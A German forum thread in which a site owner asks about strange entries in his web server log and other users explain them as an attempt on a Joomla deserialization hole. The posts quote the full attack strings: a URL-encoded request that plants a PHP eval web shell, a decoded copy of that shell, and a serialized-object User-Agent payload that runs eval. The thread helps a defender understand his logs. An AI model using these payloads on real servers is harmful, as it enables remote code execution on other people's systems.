Ein gutes Neues allerseits,

bevor hier endgültig das große Gähnen um sich greift, weil die Besucherzahlen rückläufig sind, hab ich hier mal eine etwas ominöse Sache, die ich vielleicht überbewerte ... oder auch nicht, aber auf jeden Fall nicht verstehe.

Seitdem ich mir einen eigenen Weblogger gebastelt habe (bzw. noch immer daran herumschraube), schaue ich mir die Anfragen an meine drei Webpräsenzen zwangsläufig öfter mal genauer an. Dabei sind mir einige seltsame Anfragen aufgefallen, die meist mit dem Response-Code 503 quittiert werden, der soviel bedeutet wie "Service unavailable", auf Deutsch soviel wie "Dienst nicht verfügbar". Diese "Anfragen" kommen aus aller Welt, die meisten betreffen eine nicht vorhandene Datei namens wp-login.php ... da versuchen wohl einige, eine nicht vorhandene WordPress-Installation zu knacken. Doch heute ist mir eine Anfrage aus Italien (Toscana, Bibbiena) aufgefallen, die mit einer mir völlig unverständlichen und daher auf mich bedrohlich wirkenden Anfrage im Protokoll steht:

"GET /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/administrator/dbconfig.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1"

Von dieser IP-Adresse wurden gezielt alle drei Webpräsenzen (gehostet bei 1&1) mit diesem Befehl "abgegrast". Hier ist vielleicht wichtig zu wissen, daß im Protokoll hinter dem Get die Datei steht, die heruntergeladen oder angezeigt werden soll. Es wird aber noch seltsamer: Als UserAgent (=Programm, das sie Abfrage tätigt, z.B. Webbrowser) steht im Protokoll das hier:

"}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:46:\"eval($_REQUEST[1]);JFactory::getConfig();exit;\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\xf0\x9d\x8c\x86"

Nun, ich habe weder WordPress noch eine MySQL-Datenbank am Laufen und daher wohl auch nichts zu befürchten, aber mich würde schon interessieren, was dieses kryptische Zeug zu bedeuten hat ... Vielleicht hat ja jemand von euch Ahnung von sowas ...

Da versucht jemand in die administrator/dbconfig.php einen PHP eval Befehl zu schreiben. Wäre dies erfolgreich, könnte man danach einfach diese Datei mit einem beliebigen PHP-Befehl als Parameter aufrufen und er würde auf dem Server ausgeführt. Der Befehl, der in die Datei geschrieben werden soll, lautet nämlich einfach:

Mit WordPress oder MySQL hat das nichts zu tun, es reicht, wenn die Webseite nicht sauber programmiert ist und die übergebenen Befehle ausführt.

Ich würde sagen, das wird versucht eine Joomla Sicherheitslücke auszunutzen: blog.cloudflare.com/...alize-vulnerability/

Moin Jaenicke,

jaenicke hat folgendes geschrieben :

Da versucht jemand in die administrator/dbconfig.php einen PHP eval Befehl zu schreiben. Wäre dies erfolgreich, könnte man danach einfach diese Datei mit einem beliebigen PHP-Befehl als Parameter aufrufen und er würde auf dem Server ausgeführt. Der Befehl, der in die Datei geschrieben werden soll, lautet nämlich einfach: markieren PHP-Quelltext     1: <?php eval($_POST[1]);?>

Die Datei administrator/dbconfig.php gibt's bei mir jedoch nicht, zumindest nirgendwo in jener Ordner-Struktur, auf die ich via FTP Zugang habe. Dann habe ich wohl nichts zu befürchten.

jaenicke hat folgendes geschrieben :

Mit WordPress oder MySQL hat das nichts zu tun, es reicht, wenn die Webseite nicht sauber programmiert ist und die übergebenen Befehle ausführt.

Naja, ich las eben nur diese Sachen aus dem String, der den User-Agenten beschreiben soll, heraus: "JDatabaseDriverMysqli\" und "JDatabaseDriverMysql\". Versuche, eine vermutete WordPress-Installation zu "knacken", bemerke ich recht häufig, das sind aber andere Fälle, die dann z.B. so aussehen:



Hier zähle ich heute morgen nach der letzten Aktualisierung der Datenbank 320 Versuche seit dem 29.07.2015, und zwar aus aller Herren Länder, China, Ukraine, Frankreich, Italien, Kasachstan usw.

Moin Nersgatt,

Nersgatt hat folgendes geschrieben :

Ich würde sagen, das wird versucht eine Joomla Sicherheitslücke auszunutzen: blog.cloudflare.com/...alize-vulnerability/

Den Link-Inhalt hab ich mir kurz angeschaut, muß aber gestehen, daß ich davon nicht wirklich etwas begreife. Und da ich kein Joomla verwende, bin ich hier wohl auf der sicheren Seite

Muß oder sollte ich jetzt was unternehmen wegen diesen Versuchen, z.B. den italienischen Provider oder besser gleich die Bundeszentrale für Sicherheit in der Informationstechnik benachrichtigen?

Perlsau hat folgendes geschrieben :

Die Datei administrator/dbconfig.php gibt's bei mir jedoch nicht, zumindest nirgendwo in jener Ordner-Struktur, auf die ich via FTP Zugang habe. Dann habe ich wohl nichts zu befürchten.

Dann war der Angriff vermutlich nicht erfolgreich. Theoretisch könnte diese natürlich auch schon wieder gelöscht worden sein, aber das ist wohl unwahrscheinlich. Du kannst ja prüfen, ob es auf die Datei Zugriffsversuche gab. Wenn diese nicht erfolgreich waren, passt alles.

Solange auf der Webseite nicht der von Nersgatt verlinkte Code benutzt wird, kann der Code aber auch nicht erfolgreich sein. Das beschränkt sich aber nicht auf Joomla. Der Code wurde auch in anderen Systemen benutzt.

Es gibt hier überhaupt keine PHP-Dateien. Meine Webseiten sind vollkommen statisch und bestehen aus reinstem HTML, keine Buttons, kein Javascript.

Jetzt hab ich mal in älteren Logs nach mysql gesucht, finde dort aber nichts weiter außer ein paar Usern der Delphipraxis, die von dort (aus einem Thema, das den Begriff mysql enthält) auf einer meiner Sites gelandet sind.

Perlsau hat folgendes geschrieben :

Es gibt hier überhaupt keine PHP-Dateien. Meine Webseiten sind vollkommen statisch und bestehen aus reinstem HTML, keine Buttons, kein Javascript.

Dann brauchst du dir gar keine Sorgen machen. Solche Angriffe basieren darauf, dass Parameter an Skripte falsch behandelt werden usw., was aber natürlich nur gehen kann, wenn du auch Skripte auf dem Server hast.
Wenn du nur HTML-Seiten ohne PHP oder irgendetwas drauf liegen hast, kann da auch nichts passieren.

Einzig ein Angriff auf den Webserver an sich wäre noch möglich, aber darauf hast du dann wenig Einfluss. Du kannst nur prüfen, ob dein Hoster den Webserver aktuell hält.

Und ein Erraten des FTP-Passwortes wäre denkbar.